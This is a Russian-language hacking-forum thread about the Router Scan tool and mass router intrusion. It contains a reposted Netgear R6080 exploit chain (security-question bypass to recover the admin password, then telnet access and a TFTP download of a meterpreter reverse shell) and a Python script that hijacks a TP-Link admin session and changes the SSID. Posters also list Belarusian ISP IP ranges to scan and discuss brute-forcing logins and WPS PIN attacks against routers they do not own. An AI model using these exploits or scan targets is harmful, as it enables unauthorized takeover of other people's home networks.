прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. Triton_Mgn

    Triton_Mgn Well-Known Member

    Joined:
    6 Jul 2015
    Messages:
    3,458
    Likes Received:
    4,820
    Reputations:
    46
    Что это епта
     
    sha9 likes this.
  2. Triton_Mgn

    Triton_Mgn Well-Known Member

    Joined:
    6 Jul 2015
    Messages:
    3,458
    Likes Received:
    4,820
    Reputations:
    46
    Хотите сказать все наше от 0 до 255?
     
    sha9 likes this.
  3. Triton_Mgn

    Triton_Mgn Well-Known Member

    Joined:
    6 Jul 2015
    Messages:
    3,458
    Likes Received:
    4,820
    Reputations:
    46
    НЕЕ ну тебя нахуй
     
    sha9 likes this.
  4. ganjibasis

    ganjibasis New Member

    Joined:
    3 Oct 2019
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    не, не мне просто интересно --- жизни хватит?
     
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,350
    Likes Received:
    8,842
    Reputations:
    115
    Хватит, если предварительно сканировать masscan'ом например.
     
    4Fun and sha9 like this.
  6. ganjibasis

    ganjibasis New Member

    Joined:
    3 Oct 2019
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    Ладно, зарою комп в землю, а как
    0-255.0-255.0-255.0-255 это будет / ?
    Шучу конеш но но, вдруг?
     
    #7066 ganjibasis, 27 Oct 2019
    Last edited: 27 Oct 2019
    sha9 likes this.
  7. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,350
    Likes Received:
    8,842
    Reputations:
    115
    В формате CIDR? 0.0.0.0/0
     
    Kakoluk and sha9 like this.
  8. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    562
    Likes Received:
    730
    Reputations:
    2
    доброго времени суток.
    эксплойт на Netgear wifi router R6080 также применим и к JWNR2010v5 кому интересно.возможно может быть применим и к роутерскану (если его еще там нет.хотя вроде свеженькие уязвимости, но.....) :)
    == Security Questions Bypass > Answers Disclosure ==
    >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
    <POST REQUEST>
    htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
    (replace)
    dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
    (by)
    dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
    <POST RESPONSE>
    <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
    <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
    (repeat recovery process for get admin password)

    для проверки на уязвимость можно поиграться

    полный список уязвимых параметров включая телнет и готовый эксплойт
    == Files Containing Juicy Info ==
    >> http://192.168.1.1/currentsetting.htm
    Firmware=V1.0.0.34WW
    Model=R6080
    >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
    <serialNumber>SSSSSSSNNNNNN</serialNumber>

    == Security Questions Bypass > Answers Disclosure ==
    >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
    <POST REQUEST>
    htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
    (replace)
    dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
    (by)
    dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
    <POST RESPONSE>
    <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
    <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
    (repeat recovery process for get admin password)

    == Authenticated Telnet Command Execution ==
    >> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
    :~$ telnet 192.168.1.1
    R6080 login: admin
    Password: Str0nG-!P4ssW0rD
    {
    upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
    download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
    }



    # Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
    # Date: 13/07/2019
    # Exploit Author: Wadeek
    # Hardware Version: R6080-100PES
    # Firmware Version: 1.0.0.34 / 1.0.0.40
    # Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
    # Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)

    == Files Containing Juicy Info ==
    >> http://192.168.1.1/currentsetting.htm
    Firmware=V1.0.0.34WW
    Model=R6080
    >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
    <serialNumber>SSSSSSSNNNNNN</serialNumber>

    == Security Questions Bypass > Answers Disclosure ==
    >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
    <POST REQUEST>
    htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
    (replace)
    dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
    (by)
    dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
    <POST RESPONSE>
    <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
    <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
    (repeat recovery process for get admin password)

    == Authenticated Telnet Command Execution ==
    >> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
    :~$ telnet 192.168.1.1
    R6080 login: admin
    Password: Str0nG-!P4ssW0rD
    {
    upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
    download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
    }

    шодан дорк
    R6080

    прошу пардонить если баян.давно не был на форуме. подотстал от событий.
     
    #7068 sha9, 28 Oct 2019
    Last edited: 28 Oct 2019
    Triton_Mgn and CRACK211 like this.
  9. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    562
    Likes Received:
    730
    Reputations:
    2
    еще один интересный готовый эксплойт на туполинк TL-WR1043ND V2 от 10 октября 19 г.
    нет времени разбираться в деталях. но не сложный в отдельных запросах. может кто опробует уязвимости и отпишется

    import requests

    ascii = '''
    __________ __ _ __
    /_ __/ __ \ / / (_)___ / /__
    / / / /_/ /_____/ / / / __ \/ //_/
    / / / ____/_____/ /___/ / / / / ,<
    /_/ /_/ /_____/_/_/ /_/_/|_|

    '''
    print(ascii)
    Default_Gateway = raw_input("Enter your TP-Link router IP: ")

    # Constants
    url = 'http://'
    url2 = '/userRpm/LoginRpm.htm?Save=Save'
    full = url + Default_Gateway + url2
    # full = str(full)

    # The full GET request with the cookie authorization hijacked
    req_header = {
    'Host': '{}'.format(Default_Gateway),
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway),
    'Connection': 'close',
    'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''',
    'Upgrade-Insecure-Requests': '1'
    }

    try:
    response = requests.get(full, headers=req_header).content
    except requests.exceptions.ConnectionError:
    print("Enter a valid Default Gateway IP address\nExiting...")
    exit()
    generate = response.split('/')[3] # Gets the randomized URL "session ID"


    option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ")

    if option_1 is 1:

    if generate in response:
    print('Vulnerable!\n')
    option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ')
    if option_2 is 2:
    newssid = raw_input('New name: ')
    ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4&region=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format(
    newssid)
    changessid_full = url + Default_Gateway + '/' + generate + ssid_url
    requests.get(changessid_full, headers=req_header)
    print('Changed to: {}'.format(newssid))
    else:
    ("Please choose the correct option.\nExiting...")
    exit()
    else:
    print('Not Vulnerable')
    exit()
    else:
    print("Please choose the correct option.\nExiting...")
    exit()
     
    WELK, Triton_Mgn and CRACK211 like this.
  10. conar

    conar Active Member

    Joined:
    23 Apr 2017
    Messages:
    134
    Likes Received:
    114
    Reputations:
    0
    QBR-1041AC пишет Unknown (MTSRouter)
     
  11. Solovey777

    Solovey777 New Member

    Joined:
    8 Nov 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    добавьте роутеров eltex побольше, ростелеком перешел на них
     
  12. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    675
    Likes Received:
    951
    Reputations:
    7
    Всё умерло. Капитализм, однако. Купили капитана. Забудь.
     
    binarymaster likes this.
  13. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    938
    Likes Received:
    1,509
    Reputations:
    18
    Эра ролтонскана потихоньку подходит к своему концу. Там, где пару лет назад, находились тысячи устройств, теперь едва 400 набирается. В локалках весь трафик порезан, на роутерах админки с заводскими небрутабельными паролями. И админок уже на некоторых аппаратах нет. Качай мудильное приложение, сканируй QR, в приложении и настраивай.
     
  14. brkt

    brkt New Member

    Joined:
    13 Nov 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Добрый вечер. Скажите кто-нибудь, сканирую в Router Scan близ лежащие диапазоны, но нет ничего. Сталкивался кто с таким? Может кто подможет?
    D4:6E:0E:3C:5A:B1
    C0:4A:00:96:44:D6
    84:16:F9:20:48:24
    98:DE:D0:8F:E0:6E
    Белтелеком
    Буду очень признателен!
     
  15. Valtasar

    Valtasar New Member

    Joined:
    10 Oct 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    " близ лежащие диапазоны " Гомеля
    37.44.104.0-37.44.111.255
    37.45.96.0-37.45.127.255
    46.28.97.0-46.28.97.255
    46.53.168.0-46.53.175.255
    79.98.49.0-79.98.51.255
    82.209.208.0-82.209.213.255
    82.209.214.56-82.209.214.63
    86.57.136.0-86.57.143.255
    86.57.202.0-86.57.207.255
    91.149.153.0-91.149.153.255
    91.149.156.0-91.149.156.255
    93.85.50.0-93.85.50.255
    93.85.200.0-93.85.207.255
    93.125.36.0-93.125.37.255
    93.125.45.0-93.125.45.255
    164.177.200.0-164.177.200.255
    164.177.223.0-164.177.223.255
    178.123.0.0-178.123.111.255
    178.123.113.0-178.123.255.255
    178.124.166.0-178.124.166.255
    178.124.216.0-178.124.223.255
    178.172.183.0-178.172.183.255
    178.172.186.0-178.172.186.255
    178.172.229.0-178.172.229.255
    178.172.231.0-178.172.232.255
    194.158.205.0-194.158.205.255
     
  16. Slayer

    Slayer Member

    Joined:
    5 Nov 2016
    Messages:
    50
    Likes Received:
    8
    Reputations:
    0
    Подскажите плиз, routerscan не вытаскивает данные с модели TP-LINK TL-WR841N (из внутренней сети роутера, подключение wi-fi) - вроде бы в руководстве указано наличие эксплойта, в чём может быть проблема?
     
    4Fun likes this.
  17. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    938
    Likes Received:
    1,509
    Reputations:
    18
    Эксплоит берет не все аппаратные версии этого роутера, и не все версии прошивок.


    Если есть логин и пароль администратора, но роутерскан не может ничего вытянуть, стоит роутерскан обновить. Или попинать binarymaster a, в новых прошивках, где для входа требуется только пароль, даже с рабочим паролем роутерскан не может авторизоваться.
     
    4Fun, Payer and Slayer like this.
  18. Slayer

    Slayer Member

    Joined:
    5 Nov 2016
    Messages:
    50
    Likes Received:
    8
    Reputations:
    0
    Спс, именно логин и пароль хотелось получить - прошивка с логином и паролем (жаль, что не все берёт). Ещё есть блокировка ввода логина после 10 неправильных попыток - подумал, может на этом спотыкается routerscan - он же вроде сначала пробует авторизоваться по списку логин:пароль.. Ещё порт ssh открыт..
     
    4Fun likes this.
  19. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    675
    Likes Received:
    951
    Reputations:
    7
    Есть рабочие дампы(из Charles) страничек для непарсящихся(неподдерживаемых) роутеров TP-LINK, в частности:
    TP-Link Archer C20 4.0
    TP-Link Archer C5 4.0
    Проблема в том, что кэп не хочет уже этим заниматься(сменились приоритеты). А инстинкт "обладания", не позволит отдать исходники публике(это ведь опасно:D).
    На лицо синдром "Собаки на сене"(с).
    И сам не ест, и другим не даёт. ;)
     
  20. Zhendos2302

    Zhendos2302 New Member

    Joined:
    15 Mar 2016
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Всем привет. Кто нибудь решил проблему awus036NHA Windows 10(драйвер установился сам):
    В атаках на WPS ПИН при использовании alfa awus036nha[​IMG] я получал сообщение об ошибке:
    [-] Failed to start raw packet capture.
    [-] Try updating you
    На встроенном wi-fi все работает.
     
Loading...